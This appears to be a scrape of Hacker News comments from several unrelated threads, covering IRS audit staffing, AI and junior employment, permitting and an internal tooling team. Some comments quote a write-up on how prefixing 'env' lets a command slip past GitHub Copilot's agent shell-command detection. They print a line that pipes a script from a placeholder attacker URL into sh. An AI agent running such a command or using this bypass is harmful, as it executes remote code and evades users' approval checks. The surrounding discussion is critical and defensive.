> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:
It's because in this case "curl" is just a parameter to env. Env just happens to execute curl (or indeed sh, which seems, uh, worse).
Seems nuts to have env or find on the default allowlist to me! Really these agents shouldn't be able to execute anything at all without approval by default, if you want to give it something like "find" or "env" to do safe things without approval, reimplement the functionality you want as a tool that can't do arbitrary code execution.
Honestly it's for the best. People keep thinking it's safe to use AI tools without VM, credential, and network sandboxing, the same way a person who's "only buzzed" thinks it's safe to drive a car. I wouldn't trust an agent's heuristics any more than a prisoner in a gun factory.
I don't think we (mods) did that one, but I do like it, because the original title would provoke many comments reacting only to the "LLMs are good at SQL" claim in the title, reducing discussion of the actual post. The comments do have some of this, but it would be worse if that bit were also in the title.
(In that way you can see the title edit as conforming to the HN guideline: ""Please use the original title, unless it is misleading or linkbait; don't editorialize."" under the "linkbait" umbrella. - https://news.ycombinator.com/newsguidelines.html)
> A modern auto paint shop emits volatile organic compounds (VOCs) during primer, base coat, and clear coat application. The Bay Area AQMD makes permitting a new paint shop nearly impossible. This is THE classic example of what you can't do in CA.
Banned in California.. wait, I meant the Bay Area.
That's a success rate that largely is based on suing people who don't have the resources to fight it (no claims made about if they're right or not).
However, the IRS has had reductions in staff and funding which made it harder to go after the bigger accounts who have more forensic accounting needing to be done to find the money in the various tax shelters.
> "The IRS is simultaneously confronting a reduction of 27% of its workforce, leadership turnover, and the implementation of extensive and complex tax law changes" mandated by Republicans' tax and spending measure that President Donald Trump signed into law last summer, Collins said in her report.
> The Global High Wealth department of the IRS is designed to audit ultrawealthy individuals and corporations, who often hire highly sophisticated tax advisors to devise ways to avoid taxes and to respond to the IRS if they are challenged. But, as of late March, the department was cut by nearly 40 percent—and likely more by now with the additional RIFs.
I would be willing to contend that while they've got a 93% overall, that's historical numbers and the teams that would go against Meta and others are severely understaffed.
I don't think so, I think it's Stripe's version on an internal tooling team, what I found to be called DevEx/Core Engineering/Dev Productivity/EngProd/Engineering Excellence in companies I worked at.
This team seems to be called Leverage. I would've called it Fulcrum. Or Turbo. Or Spinach (like in Popeye).
> Brynjolfsson analyzed millions of ADP payroll records and found a 13% relative decline in employment for early-career workers (ages 22-25) in AI-exposed occupations since late 2022.
> So what’s the mechanism at play? AI replaces codified knowledge
Many job postings peaked in 2022 due to the pandemic. The original paper tries to account for this but falls short in my opinion.
Original paper said[1]:
> One possibility is that our results are explained by a general slowdown in technology hiring from 2022 to 2023 as firms recovered from the COVID-19 Pandemic...
> Figure A12 shows employment changes by age and exposure quintile after excluding computer occupations...
> Figure A13 shows results when excluding firms in information technology or computer systems design...
> ... These results indicate that our findings are not specific to technology roles.
Excluding computer and IT jobs is not enough in my opinion. Look at all these other occupations which had peak hiring in 2022.
> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:
> env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
So GH Copilot restricts curl, but not if it's run with `env` prepended.
reply